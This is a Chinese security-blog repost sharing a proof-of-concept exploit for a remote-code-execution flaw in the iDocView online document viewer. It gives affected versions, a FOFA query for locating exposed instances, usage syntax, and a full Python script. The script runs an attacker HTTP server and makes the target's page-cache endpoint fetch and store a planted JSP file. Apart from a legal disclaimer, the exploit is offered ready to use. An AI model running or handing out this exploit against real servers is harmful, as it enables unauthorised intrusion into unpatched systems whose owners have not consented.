POC|SpringKill的IDOC_RCE利用POC

admin
admin
admin
138107
文章
113
评论
2023年11月24日11:11:19评论55 views字数 2197阅读7分19秒阅读模式



爱好开源的大牛子,不光代审分析了这个漏洞,现在又把这个漏洞POC开源出来了,大家看不懂分析的学习一下,已经有小伙伴找他击剑了,呆哥替他欢迎大家骚扰。

SpringKill师傅的Github地址:https://github.com/springkill



sdfd

 

01

工具简介

 - 项目名称:springkill/idocv_poc

- 项目地址:

https://github.com/springkill/idocv_poc

- 项目描述:

I DOC VIEW RCE的Poc,本脚本仅供合法的有授权的测试使用,切勿用于未授权场景,切勿用于任何非法途径!!任何人使用此Poc进行非法操作造成的后果,SpringKill不承担任何责任!!!

- 项目优点:

1day poc

 

02

产品简介

iDocView是一个在线文档解析应用,旨在提供便捷的文件查看和编辑服务。

 

03

漏洞概述 

本次漏洞出现在在线文档解析应用中的远程页面缓存功能。具体问题在于该应用未能对用户输入的URL进行充分的安全验证,从而导致存在安全隐患。攻击者可通过构造特殊的URL,引诱应用下载恶意文件。

 

04

影响范围

 iDocView < 13.10.1_20231115

 

05

Fofa语句

 title=="在线文档预览 - I Doc View"

 

06

POC用法

python3 script.py <IP_ADDRESS> <PORT> <REMOTE_IP> <REMOTE_PORT>

 POC|SpringKill的IDOC_RCE利用POC

import http.serverimport socketserverimport sysimport threadingimport requests
visited_pages = {'/': False, '/......docviewpoc.jsp': False}
class MyHttpRequestHandler(http.server.SimpleHTTPRequestHandler):    def do_GET(self):        global visited_pages        if self.path in visited_pages:            visited_pages[self.path] = True
            if all(visited_pages.values()):                print("Success! Go to http://{}:{}/poc.jsp".format(remote_ip,remote_port))                threading.Thread(target=server.shutdown).start()
        if self.path == '/':            self.send_response(200)            self.send_header("Content-type", "text/html")            self.end_headers()            html = f'''<html><head><title>Index Page</title></head><body>    <link href="http://{ip_address}:{port}/......docviewpoc.jsp"></body></html>'''            self.wfile.write(html.encode('utf-8'))        elif self.path == '/......docviewpoc.jsp':            self.send_response(200)            self.send_header("Content-type", "text/html")            self.end_headers()            self.wfile.write(b"<html><body><h1>Poc Works!</h1></body></html>")        else:            self.send_error(404, "File not found")
    def log_message(self, format, *args):        return
def send_request_to_remote():    remote_url = f'http://{remote_ip}:{remote_port}/html/2word?url={ip_address}:{port}'    try:        response = requests.get(remote_url)    except Exception as e:        pass
if len(sys.argv) < 5:    print("Usage: python script.py <IP_ADDRESS> <PORT> <REMOTE_IP> <REMOTE_PORT>")    sys.exit(1)
ip_address = sys.argv[1]port = int(sys.argv[2])remote_ip = sys.argv[3]remote_port = sys.argv[4]
def start_server():    global server    server = socketserver.TCPServer((ip_address, port), MyHttpRequestHandler)    server.serve_forever()
server_thread = threading.Thread(target=start_server)server_thread.start()
send_request_to_remote()


原文始发于微信公众号(阿呆攻防):POC|SpringKill的IDOC_RCE利用POC

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月24日11:11:19
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   POC|SpringKill的IDOC_RCE利用POChttps://cn-sec.com/archives/2234424.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息